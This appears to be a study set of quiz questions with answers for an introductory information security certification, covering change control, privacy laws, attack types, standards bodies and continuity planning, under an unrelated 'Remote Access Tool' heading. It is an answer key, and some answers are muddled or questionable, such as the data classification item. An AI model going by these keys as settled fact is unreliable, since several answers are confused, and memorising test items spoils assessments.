Remote Access Tool (RAT)

What is the correct order of change control procedures regarding changes to systems and networks? Request, approval, impact assessment, build/test, monitor, implement Request, impact assessment, approval, build/test, implement, monitor Request, approval, impact assessment, build/test, implement, monitor Request, impact assessment, approval, build/test, monitor, implement

Request, impact assessment, approval, build/test, implement, monitor

During which step of the incident-handling process is the goal to contain the incident? Identification Notification Response Recovery and follow-up

Response

Which of the following is not one of the rights afforded to students (or the parents of a minor student) under the Family Educational Rights and Privacy Act (FERPA)? Right to inspect student records Right to request correction of errors Right to delete unwanted information from records Right to consent to data release

Right to delete unwanted information from records

Which of the following does not need to comply with the Family Educational Rights and Privacy Act (FERPA)? Schools that do not receive federal funds State and local educational agencies Public colleges and universities Primary and secondary schools

Schools that do not receive federal funds

Aditya is a network technician. He is collecting system data for an upcoming internal system audit. He is currently performing vulnerability testing to determine what weaknesses may exist in the network's security. What form of assessment is he conducting? Checklists Observation Security testing Configuration review

Security testing

Aditya is attempting to classify information regarding a new project that his organization will undertake in secret. Which characteristic is not normally used to make these types of classification decisions? Value Sensitivity Criticality Threat

Sensitivity or Criticality or Threat (The three criteria normally used to make classification decisions are value, sensitivity, and criticality.)

Mia is her company's network security professional. She is developing access policies based on personnel security principles. As part of this effort, she is devising a method of taking high-security tasks and splitting them among several different employees so that no one person is responsible for knowing and performing the entire task. What practice is she developing? Job rotation Limiting access Mandatory vacations Separation of duties

Separation of duties

Devaki is investigating an attack. An intruder managed to take over the identity of a user who was legitimately logged in to Devaki's company's website by manipulating Hypertext Transfer Protocol (HTTP) headers. Which type of attack likely took place? Session hijacking Extensible Markup Language (XML) injection Cross-site scripting (XSS) Structured Query Language (SQL) injection

Session hijacking

Which intrusion detection system strategy relies on pattern matching? Behavior detection Traffic-based detection Statistical detection Signature detection

Signature detection

Which of the following items would generally not be considered personally identifiable information (PII)? First and last name Driver's license number Biometric data Social media post

Social media post

The chief executive officer (CEO) of a company recently fell victim to an attack. The attackers sent the CEO an email that appeared to come from the company's attorney. The email informed the CEO that his company was being sued and he needed to view a subpoena at a court website. When visiting the website, malicious code was downloaded onto the CEO's computer. What type of attack took place? Spear phishing Pharming Ransomware Command injection

Spear phishing

What type of attack occurs in real time and is often conducted against a specific target? Unstructured Structured Direct Indirect

Structured

Bob is developing a web application that depends on a backend database. What type of attack could a malicious individual use to send commands through his web application to the database? Cross-site scripting (XSS) Extensible Markup Language (XML) injection Structured Query Language (SQL) injection Lightweight Directory Access Protocol (LDAP) injection

Structured Query Language (SQL) injection

Carl has assembled a team of representatives from each department to test a new business continuity plan (BCP). During the test, the representatives meet in a room and review many aspects of the plan, such as the goals, scope, assumptions, and the structure of the organization. They also conduct scenario-based exercises as though they are executing the plan for a certain type of incident to find errors, such as gaps or overlaps. What type of plan is being conducted? Checklist Structured walk-through

Structured walk-through

Joe is responsible for the security of the systems that control and monitor devices for a power plant. What type of system does Joe likely administer? Supervisory Control and Data Acquisition (SCADA) Embedded robotic systems Mobile fleet Mainframe

Supervisory Control and Data Acquisition (SCADA)

Which of the following is a type of denial of service (DoS) attack? Logic bomb Synchronize (SYN) flood Cross-site scripting (XSS) Structured Query Language (SQL) injection

Synchronize (SYN) flood

Which type of virus targets computer hardware and software startup functions? Hardware infector System infector File infector Data infector

System infector

What type of security monitoring tool would be most likely to identify an unauthorized change to a computer system? Network intrusion detection system (IDS) System integrity monitoring Closed-circuit TV Data loss prevention

System integrity monitoring

Ben is working toward a position as a senior security administrator. He would like to earn his first International Information Systems Security Certification Consortium (ISC)2 certification. Which certification is most appropriate for his needs? Systems Security Certified Practitioner (SSCP) Certified Information Systems Security Professional (CISSP) Certified Secure Software Lifecycle Professional (CSSLP) Certified Cloud Security Professional (CCSP)

Systems Security Certified Practitioner (SSCP)

Susan is a digital forensic examiner. She is investigating a case in which a driver has been accused of vehicular homicide. She has the driver's mobile device and cellular records. What type of mobile device evidence is most likely to reveal whether the driver was actively using a mobile device when the incident occurred? Global positioning system (GPS) information and history Network connection information and history Text messages Device information

Text messages

Which of the following is not true of contingency planning? The maximum tolerable downtime (MTD) is the maximum period of time that a business can survive a disabled critical function. The recovery time objective (RTO) is the amount of time needed to recover a business process. It is often made up of several interlinked RTOs. The recovery point objective (RPO) is the point to which data must be recovered. The mean time between failures (MTBF) is closely associated with the recovery time objectives (RTOs) of several integrated critical business functions (CBFs).

The mean time between failures (MTBF) is closely associated with the recovery time objectives (RTOs) of several integrated critical business functions (CBFs).

How are the Health Insurance Portability and Accountability Act (HIPAA) and Payment Card Industry Data Security Standard (PCI DSS) alike? They both focus on the health care industry. They both have requirements that protect the confidentiality, integrity, and availability of data. The same federal agencies have oversight over both HIPAA and PCI DSS. They have similar scopes.

They both have requirements that protect the confidentiality, integrity, and availability of data.

Under the Health Insurance Portability and Accountability Act (HIPAA) Privacy Rule, covered entities may not use or disclose people's protected health information (PHI) without their written consent, although there are exceptions. Which of the following is generally not an allowed exception under the Privacy Rule? To provide medical treatment To process payment To discuss a patient's medical status at a conference To report victims of child abuse and neglect

To discuss a patient's medical status at a conference

The Internet Engineering Task Force (IETF) works closely with the World Wide Web Consortium (W3C) and the International Organization for Standardization (ISO)/International Electrotechnical Commission (IEC) focusing on which of the following? Special Publications (SPs) Transmission Control Protocol/Internet Protocol (TCP/IP) ISO standard ISO/IEC 27002

Transmission Control Protocol/Internet Protocol (TCP/IP)

Lin installed a time-management utility that she downloaded from the Internet. Now several applications are not responding to normal commands. What type of malware did she likely encounter? Virus Worm Ransomware Trojan horse

Trojan horse

True or False? Regarding disaster recovery, an alternate processing center or mirrored site is always ready and under the organization's control.

True

True or False? A Faraday bag stops any electromagnetic emanations from passing into or out of the bag, preventing a mobile device from communicating with the outside world.

True

True or False? A backdoor is a hidden way to bypass access controls and allow access to a system or resource.

True

True or False? A blanket purchase agreement (BPA) creates preapproved accounts with qualified suppliers to fulfill recurring orders for products or services.

True

True or False? A certification is an official statement that validates that a person has satisfied specific job requirements.

True

True or False? A computer virus is an executable program that attaches to, or infects, other executable programs.

True

True or False? A functional policy declares an organization's management direction for security in such specific functional areas as email use, remote access, and Internet interaction (including social media).

True

True or False? A network engineer in the United States who needs guidance on information security systems could consult the National Institute of Standards and Technology (NIST) Special Publications 800 series.

True

True or False? A parallel test of a contingency plan is the same as a full-interruption test except that processing does not stop at the primary site.

True

True or False? A rootkit is a type of malware that modifies or replaces one or more existing programs to hide the fact that a computer has been compromised.

True

True or False? A security awareness program should address the requirements and expectations of an organization's security policy.

True

True or False? A successful business impact analysis (BIA) maps the context, the critical business functions (CBFs), and the processes on which they rely.

True

True or False? After audit activities are completed, auditors perform data analysis.

True

True or False? American Institute of Certified Public Accountants (AICPA) Service Organization Control (SOC) 2 reports are commonly implemented for service providers, hosted data centers, and managed cloud computing providers.

True

True or False? An American Institute of Certified Public Accountants (AICPA) Service Organization Control (SOC) 1 report is commonly implemented for organizations that must comply with Sarbanes-Oxley (SOX) or the Gramm-Leach-Bliley Act (GLBA).

True

True or False? An auditing benchmark is the standard by which a system is compared to determine whether it is securely configured.

True

True or False? An example of a nonaccess computer crime is crashing a target's critical functionality to prevent normal (revenue-creating) processes from occurring.

True

True or False? An organization can maintain a cloud-based disaster recovery site for a fraction of the cost of a physical site.

True

True or False? Any component that, if it fails, could interrupt business processing is called a single point of failure (SPOF).

True

True or False? Attackers have established thousands of botnets, which they use to distribute malware and spam and to launch denial of service (DoS) attacks against organizations or even countries.

True

True or False? Attacks against confidentiality and privacy, data integrity, and availability of services are all ways malicious code can threaten businesses.

True

True or False? Because people inside an organization generally have more detailed knowledge of the IT infrastructure than outsiders do, they can place logic bombs more easily.

True

True or False? Business continuity management includes business continuity planning, disaster recovery planning, crisis management, incident response management, and risk management.

True

True or False? Certified Internet Web Professional (CIW) offers several credentials that focus on both general and web-related security.

True

True or False? Company-related classifications are not standard; therefore, there may be some differences of meaning between the terms "private" and "confidential" in different companies.

True

True or False? Compliance includes the actual state of being compliant as well as the steps and processes taken to become compliant.

True

True or False? Data loss prevention (DLP) uses business rules to classify sensitive information to prevent unauthorized end users from sharing it.

True

True or False? Defense in depth is the practice of layering defenses to increase overall security and provide more reaction time to respond to incidents.

True

True or False? Digital forensics is the process of using well-defined analytical and investigative techniques to guide the processes of collecting and examining evidence related to a computer security incident.

True

True or False? During an IT audit, security controls are checked to ensure they are effective, reliable, and functioning as required and expected.

True

True or False? During the planning and execution phases of an audit, an auditor will most likely review risk analysis output.

True

True or False? E-discovery is an iterative process of examining storage media, searching for items of interest, identifying likely items that may have value as evidence, and then recovering those items.

True

True or False? Even if a mobile device is deemed not to be a direct part of a crime or incident, its ability to record the environment of an attacker during the incident could be material.

True

True or False? Examples of major disruptions include extreme weather, application failure, and criminal activity.

True

True or False? Fault-tolerance options are not replacements for data backups.

True

True or False? Generally, once evidence becomes inadmissible, it cannot be fixed.

True

True or False? ISO/IEC 27002 provides organizations with best-practice recommendations on information security management.

True

True or False? In an incremental backup, you start with a full backup when network traffic is light. Then, each night, you back up only that day's changes.

True

True or False? In remote journaling, a system writes a log of online transactions to an offsite location.

True

True or False? Juniper Networks offers vendor-specific certifications for its networking product line.

True

True or False? One of the goals of the American National Standards Institute (ANSI) is to ensure the safety and health of consumers and the protection of the environment.

True

True or False? One requirement of the GIAC Security Expert (GSE) credential is that candidates must hold three GIAC credentials, with two of the credentials being Gold.

True

True or False? Patching computers and devices with the latest security fixes makes them more resistant to many types of attacks.

True

True or False? Policies that cover data management should cover transitions throughout the data's life cycle.

True

True or False? Procedures help enforce the intent of a policy.

True

True or False? Protected health information (PHI) is any individually identifiable information about a person's health.

True

True or False? RSA provides security, risk, and compliance solutions for enterprise environments.

True

True or False? Regarding an intrusion detection system (IDS), stateful matching looks for specific sequences appearing across several packets in a traffic stream, rather than just in individual packets.

True

True or False? Sarbanes-Oxley Act (SOX) Section 404 requires an organization's executive officers to establish, maintain, review, and report on the effectiveness of the company's internal controls over financial reporting (ICFR).

True

True or False? Schools and libraries that must comply with the Children's Internet Protection Act (CIPA) must also have some way to allow adults unfiltered Internet access.

True

True or False? Schools that violate the Family Educational Rights and Privacy Act (FERPA) can lose their federal funding.

True

True or False? Security breaches perpetrated by current and former employees often go undetected due to weak personnel and security policies or ineffective countermeasures.

True

True or False? Standards are mandated requirements for hardware and software solutions used to address security risk throughout an organization.

True

True or False? Standards provide guidelines to ensure that products in today's computing environments work together.

True

True or False? Stealth viruses attack countermeasures, such as antivirus signature files or integrity databases, by searching for these data files and deleting or altering them.

True

True or False? The (ISC)2 Certified Cloud Security Professional (CCSP) certification was created by both (ISC)2 and the Cloud Security Alliance (CSA).

True

True or False? The Common Criteria is a set of system procurement standards used by several countries.

True

True or False? The Federal Information Security Modernization Act (FISMA) of 2014 assigned the Department of Homeland Security (DHS) the responsibility for developing, implementing, and ensuring federal government-wide compliance as per FISMA information security policies, procedures, and security controls.

True

True or False? The Gramm-Leach-Bliley Act (GLBA) Privacy Rule requires that consumers have a chance to opt out of certain types of data sharing with nonaffiliated third parties.

True

True or False? The Institute of Electrical and Electronics Engineers (IEEE) develops and distributes standards that relate to electricity and electronics.

True

True or False? The International Electrotechnical Commission (IEC) is the preeminent organization for developing and publishing international standards for technologies related to electrical and electronic devices and processes.

True

True or False? The International Electrotechnical Commission (IEC) was instrumental in the development of standards for electrical measurements, including gauss, hertz, and weber.

True

True or False? The International Telecommunication Union (ITU) was formed in 1865 as the International Telegraph Union to develop international standards for the emerging telegraph communications industry.

True

True or False? The Internet Architecture Board (IAB) is a subcommittee of the Internet Engineering Task Force (IETF).

True

True or False? The Internet Architecture Board (IAB) serves as an advisory body to the Internet Society (ISOC).

True

True or False? The Internet Engineering Task Force (IETF) is a collection of working groups, and each working group addresses a specific topic.

True

True or False? The Sarbanes-Oxley Act (SOX) was passed after several large corporate scandals revealed fraud and shook investor confidence.

True

True or False? The United States does not have one comprehensive data protection law; instead, it has many laws that focus on different types of data found in different vertical industries.

True

True or False? The emergency operations center (EOC) is the place where an organization's recovery team will meet and work during a disruption.

True

True or False? The function of homepage hijacking is to change a browser's homepage to point to the attacker's site.

True

True or False? The goal of a command injection is to execute commands on a host operating system.

True

True or False? The idea that users should be granted only the levels of permissions they need to perform their duties is called the principle of least privilege.

True

True or False? The purpose of the Children's Online Privacy Protection Act of 1998 (COPPA) is to restrict the online collection of personal information of children under 13 years of age.

True

True or False? The recovery point objective (RPO) can come from the business impact analysis (BIA) or sometimes from a government mandate, such as banking laws.

True

True or False? The success of Trojans is due to their reliance on social engineering to spread and operate; they have to trick users into running them.

True

True or False? The term "web defacement" refers to someone gaining unauthorized access to a web server and altering the index page of a site on the server.

True

True or False? Time stamps correspond to computer log files to help coordinate a sequence of events and are accurate to at least the second.

True

True or False? Two common methods to protect evidence during imaging are to use forensic software that forces read-only mode or connect the evidence device using a hardware interface that blocks any write operations.

True

True or False? Under Securities and Exchange Commission (SEC) rules, internal controls over financial reporting (ICFR) are processes that provide reasonable assurance that an organization's financial reports are reliable.

True

True or False? Under the Federal Information Security Management Act (FISMA), all federal agencies must report security incidents to the U.S. Computer Emergency Readiness Team (US-CERT).

True

True or False? Unlike viruses, worms do not require a host program to survive and replicate.

True

True or False? Using the names of superiors to convince another person that a higher authority has allowed access to information is a form of social engineering.

True

True or False? Visa, MasterCard, and other payment card vendors helped to create the Payment Card Industry Data Security Standard (PCI DSS).

True

True or False? When planning an IT audit, one must ensure that the areas not reviewed in the current audit will be subject to another audit.

True

True or False? While running business operations at an alternate site, you must continue to make backups of data and systems.

True

True or False? World Wide Web Consortium (W3C) standards and specifications ensure that web applications interact with web components from other vendors.

True

What is not a typical sign of virus activity on a system?
Unexplained decrease in available disk space
Unexpected error messages
Unexpected power failures
Sudden sluggishness of applications

Unexpected power failures

Wen is a network security professional. He wants to strengthen the security of his agency's network infrastructure defenses. Which control can he use to protect the network?
Require scanning of all removable media
Use proxy services and bastion hosts to protect critical services
Ensure that all operating systems have been patched with the latest updates from vendors
Disable any unnecessary operating system services and processes that may pose a security vulnerability

Use proxy services and bastion hosts to protect critical services

What tool might be used by an attacker during the reconnaissance phase of an attack to glean information about domain registrations?
Whois
Simple Network Management Protocol (SNMP)
Ping
Domain Name System (DNS)

Whois

Marco is in a web development program. He is studying various web-related standards that apply to Cascading Style Sheets (CSS) and HyperText Markup Language (HTML). What authoritative source should he consult?
International Electrotechnical Commission (IEC)
Internet Engineering Task Force (IETF)
International Organization for Standardization (ISO)
World Wide Web Consortium (W3C)

World Wide Web Consortium (W3C)

Hacking groups create _______ to launch attacks whereby they infect vulnerable machines with agents that perform various functions at the command of the controller.
logic bombs
honeypots
ransomware
botnets

botnets

A(n) _________ is an event that prevents a critical business function (CBF) from operating for a period greater than the maximum tolerable downtime (MTD).
incident
violation
disaster
contingency

disaster

Leola is a cybersecurity consultant hired by a company to test the effectiveness of its network's defenses. She has something in common with the malicious people who would perform the same tasks involved in _________________, except that, unlike Leola, they would not have consent to perform this action against the system.
stateful matching
penetration testing
network access control
system hardening

penetration testing

